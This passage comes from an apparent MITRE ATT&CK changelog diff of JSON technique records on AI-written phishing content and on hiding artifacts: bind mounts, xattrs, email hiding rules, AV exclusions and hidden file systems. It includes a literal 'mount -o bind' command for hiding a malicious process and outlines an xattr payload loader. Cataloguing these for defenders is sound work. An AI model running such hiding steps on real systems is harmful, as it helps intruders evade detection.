+                            "url": "https://www.europol.europa.eu/cms/sites/default/files/documents/Europol_Innovation_Lab_Facing_Reality_Law_Enforcement_And_The_Challenge_Of_Deepfakes.pdf"
+                        },
+                        {
+                            "source_name": "Nov AI Threat Tracker",
+                            "description": "Google Threat Intelligence Group. (2025, November 5). GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools. Retrieved March 31, 2026.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/threat-actor-usage-of-ai-tools"
+                        },
+                        {
+                            "source_name": "FBI 2025 AI Generate Content",
+                            "description": "Internet Crime Complaint Center, FBI. (2025). Federal Bureau of Investigation Internet Crime Report, 2025. Retrieved April 17, 2026.",
+                            "url": "https://www.ic3.gov/AnnualReport/Reports/2025_IC3Report.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Gilberto P\u00e9rez",
+                        "Alex Wong",
+                        "Patrick Mkhael (aka Pinguino)"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.705000+00:00\", \"old_value\": \"2026-04-20 15:34:51.855000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0918: Detection of Audio-Visual Content"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--6a6f9892-c46a-46db-b331-c09a99200fcf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-03-25 14:26:19.040000+00:00",
+                    "modified": "2026-05-12 15:12:00.640000+00:00",
+                    "name": "Written Content",
+                    "description": "Adversaries may create or tailor written materials to support targeting and malicious operations. Content may include phishing lures, fraudulent financial communications, fabricated job postings, fabricated employment credentials and documentation, decoy documents, social media persona content, and supporting narratives used to sustain fabricated personas over time.(Citation: GenAI Phishing)(Citation: GTIG AI Threat Tracker) Content may be authored manually, commissioned through third parties, or produced using AI-assisted tools.\n\nWritten materials may impersonate legitimate government correspondence, diplomatic communications, or internal organizational documents to support targeting efforts. AI-assisted tools may also be used to tailor content to specific targets, industries, or regions. For example, adversaries may leverage AI to translate content into a target's native language or mimic the communication style of trusted senders.\n\nWritten content produced through these methods may be used in support of other techniques, such as [Phishing](https://attack.mitre.org/techniques/T1660), [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003), [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Social Engineering](https://attack.mitre.org/techniques/T1684), [Financial Theft](https://attack.mitre.org/techniques/T1657), or [Establish Accounts](https://attack.mitre.org/techniques/T1585).\n\nWritten content does not include malicious code or scripts; for development of malicious code and scripts, see [Develop Capabilities](https://attack.mitre.org/techniques/T1587).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1683/001",
+                            "external_id": "T1683.001"
+                        },
+                        {
+                            "source_name": "GenAI Phishing",
+                            "description": "Adaptive Team. (2025, August 29). Generative AI Phishing: How to Defend in 2025. Retrieved March 26, 2026.",
+                            "url": "https://www.adaptivesecurity.com/blog/ai-phishing"
+                        },
+                        {
+                            "source_name": "GTIG AI Threat Tracker",
+                            "description": "Google Threat Intelligence Group . (2026, February 12). GTIG AI Threat Tracker: Distillation, Experimentation, and (Continued) Integration of AI for Adversarial Use. Retrieved March 25, 2026.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/distillation-experimentation-integration-ai-adversarial-use"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.640000+00:00\", \"old_value\": \"2026-04-20 15:34:25.836000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0917: Detection of Written Content"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-26 17:41:25.933000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "Hide Artifacts",
+                    "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)\n\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1564",
+                            "external_id": "T1564"
+                        },
+                        {
+                            "source_name": "Cybereason OSX Pirrit",
+                            "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.",
+                            "url": "https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf"
+                        },
+                        {
+                            "source_name": "MalwareBytes ADS July 2015",
+                            "description": "Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018.",
+                            "url": "https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/"
+                        },
+                        {
+                            "source_name": "Sofacy Komplex Trojan",
+                            "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"
+                        },
+                        {
+                            "source_name": "Sophos Ragnar May 2020",
+                            "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.",
+                            "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Office Suite",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2026-04-15 20:17:25.231000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1013: Application Developer Guidance",
+                            "M1033: Limit Software Installation",
+                            "M1047: Audit",
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0502: Detection Strategy for Hidden Artifacts Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--5bd41255-a224-4425-a2e2-e9d293eafe1c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-01-30 21:01:16.340000+00:00",
+                    "modified": "2026-05-12 15:12:00.635000+00:00",
+                    "name": "Bind Mounts",
+                    "description": "Adversaries may abuse bind mounts on file structures to hide their activity and artifacts from native utilities. A bind mount maps a directory or file from one location on the filesystem to another, similar to a shortcut on Windows. It\u2019s commonly used to provide access to specific files or directories across different environments, such as inside containers or chroot environments, and requires sudo access. \n\nAdversaries may use bind mounts to map either an empty directory or a benign `/proc` directory to a malicious process\u2019s `/proc` directory. Using the commands `mount \u2013o bind /proc/benign-process /proc/malicious-process` (or `mount \u2013B`), the malicious process's `/proc` directory is overlayed with the contents of a benign process's `/proc` directory. When system utilities query process activity, such as `ps` and `top`, the kernel follows the bind mount and presents the benign directory\u2019s contents instead of the malicious process's actual `/proc` directory. As a result, these utilities display information that appears to come from the benign process, effectively hiding the malicious process's metadata, executable, or other artifacts from detection.(Citation: Cado Security Commando Cat 2024)(Citation: Ahn Lab CoinMiner 2023)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1564/013",
+                            "external_id": "T1564.013"
+                        },
+                        {
+                            "source_name": "Ahn Lab CoinMiner 2023",
+                            "description": "Ahn Lab. (2023, April 24). CoinMiner (KONO DIO DA) Distributed to Linux SSH Servers. Retrieved April 4, 2025.",
+                            "url": "https://asec.ahnlab.com/en/51908/"
+                        },
+                        {
+                            "source_name": "Cado Security Commando Cat 2024",
+                            "description": "Nate Bill & Matt Muir. (2024, February 1). The Nine Lives of Commando Cat: Analysing a Novel Malware Campaign Targeting Docker. Retrieved April 4, 2025.",
+                            "url": "https://www.cadosecurity.com/blog/the-nine-lives-of-commando-cat-analysing-a-novel-malware-campaign-targeting-docker"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "L\u00ea Ph\u01b0\u01a1ng Nam, Group-IB"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.635000+00:00\", \"old_value\": \"2026-04-15 20:17:48.263000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0428: Detection Strategy for Bind Mounts on Linux"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-06-07 13:20:23.767000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Email Hiding Rules",
+                    "description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)\n\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.\n\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as <code>malware</code>, <code>suspicious</code>, <code>phish</code>, and <code>hack</code>) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)\n\nIn some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1564/008",
+                            "external_id": "T1564.008"
+                        },
+                        {
+                            "source_name": "MacOS Email Rules",
+                            "description": "Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021.",
+                            "url": "https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac"
+                        },
+                        {
+                            "source_name": "Microsoft Mail Flow Rules 2023",
+                            "description": "Microsoft. (2023, February 22). Mail flow rules (transport rules) in Exchange Online. Retrieved March 13, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules"
+                        },
+                        {
+                            "source_name": "Microsoft Inbox Rules",
+                            "description": "Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021.",
+                            "url": "https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59"
+                        },
+                        {
+                            "source_name": "Microsoft New-InboxRule",
+                            "description": "Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps"
+                        },
+                        {
+                            "source_name": "Microsoft Set-InboxRule",
+                            "description": "Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps"
+                        },
+                        {
+                            "source_name": "Microsoft Cloud App Security",
+                            "description": "Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021.",
+                            "url": "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dor Edry, Microsoft",
+                        "Liran Ravich, CardinalOps"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows",
+                        "Linux",
+                        "macOS",
+                        "Office Suite"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2026-04-15 20:18:10.251000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0192: Detection Strategy for Email Hiding Rules"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--762e6f29-a62f-4d96-91ed-d0073181431f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-03-27 19:40:00.716000+00:00",
+                    "modified": "2026-05-12 15:12:00.642000+00:00",
+                    "name": "Extended Attributes",
+                    "description": "Adversaries may abuse extended attributes (xattrs) on macOS and Linux to hide their malicious data in order to evade detection. Extended attributes are key-value pairs of file and directory metadata used by both macOS and Linux. They are not visible through standard tools like `Finder`,  `ls`, or `cat` and require utilities such as `xattr` (macOS) or `getfattr` (Linux) for inspection. Operating systems and applications use xattrs for tagging, integrity checks, and access control. On Linux, xattrs are organized into namespaces such as `user.` (user permissions), `trusted.` (root permissions), `security.`, and `system.`, each with specific permissions. On macOS, xattrs are flat strings without namespace prefixes, commonly prefixed with `com.apple.*` (e.g., `com.apple.quarantine`, `com.apple.metadata:_kMDItemUserTags`) and used by system features like Gatekeeper and Spotlight.(Citation: Establishing persistence using extended attributes on Linux)\n\nAn adversary may leverage xattrs by embedding a second-stage payload into the extended attribute of a legitimate file. On macOS, a payload can be embedded into a custom attribute using the `xattr` command. A separate loader can retrieve the attribute with `xattr -p`, decode the content, and execute it using a scripting interpreter. On Linux, an adversary may use `setfattr` to write a payload into the `user.` namespace of a legitimate file. A loader script can later extract the payload with `getfattr --only-values`, decode it, and execute it using bash or another interpreter. In both cases, because the primary file content remains unchanged, security tools and integrity checks that do not inspect extended attributes will observe the original file hash, allowing the malicious payload to evade detection.(Citation: Low GroupIB xattrs nov 2024)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1564/014",
+                            "external_id": "T1564.014"
+                        },
+                        {
+                            "source_name": "Establishing persistence using extended attributes on Linux",
+                            "description": "Irem Kuyucu. (2024, August 6). Establishing persistence using extended  attributes on Linux. Retrieved March 27, 2025.",
+                            "url": "https://kernal.eu/posts/linux-xattr-persistence/"
+                        },
+                        {
+                            "source_name": "Low GroupIB xattrs nov 2024",
+                            "description": "Sharmine Low. (2024, November 13). Stealthy Attributes of Lazarus APT Group: Evading Detection with Extended Attributes. Retrieved March 27, 2025.",
+                            "url": "https://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Sharmine Low, Group-IB",
+                        "Rouven Bissinger (SySS GmbH)",
+                        "RoseSecurity"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.642000+00:00\", \"old_value\": \"2026-04-15 20:19:25.896000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0406: Detection Strategy for Extended Attributes Abuse"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-03-29 16:59:10.374000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "File/Path Exclusions",
+                    "description": "Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions)\n\nAdversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than  tampering with tool settings to add a new exclusion (i.e., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1685)), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) and other [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) activities to both discover and verify existing exclusions in a victim environment.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1564/012",
+                            "external_id": "T1564.012"
+                        },
+                        {
+                            "source_name": "Microsoft File Folder Exclusions",
+                            "description": "Microsoft. (2024, February 27). Contextual file and folder exclusions. Retrieved March 29, 2024.",
+                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-contextual-file-folder-exclusions-microsoft-defender-antivirus"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2026-04-16 19:21:42.768000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1013: Application Developer Guidance",
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0051: Detection Strategy for File/Path Exclusions"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-06-28 22:55:55.719000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Hidden File System",
+                    "description": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)\n\nAdversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1564/005",
+                            "external_id": "T1564.005"
+                        },
+                        {
+                            "source_name": "FireEye Bootkits",
+                            "description": "Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html"
+                        },
+                        {
+                            "source_name": "ESET ComRAT May 2020",
+                            "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.",
+                            "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf"
+                        },
+                        {
+                            "source_name": "MalwareTech VFS Nov 2014",
+                            "description": "Hutchins, M. (2014, November 28). Virtual File Systems for Beginners. Retrieved June 22, 2020.",
+                            "url": "https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html"
+                        },
+                        {
+                            "source_name": "Kaspersky Equation QA",
+                            "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). Equation Group: Questions and Answers. Retrieved December 21, 2015.",
+                            "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2026-04-15 20:22:45.621000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0461: Detection Strategy for Hidden File System Abuse"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-26 17:46:13.128000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Hidden Files and Directories",
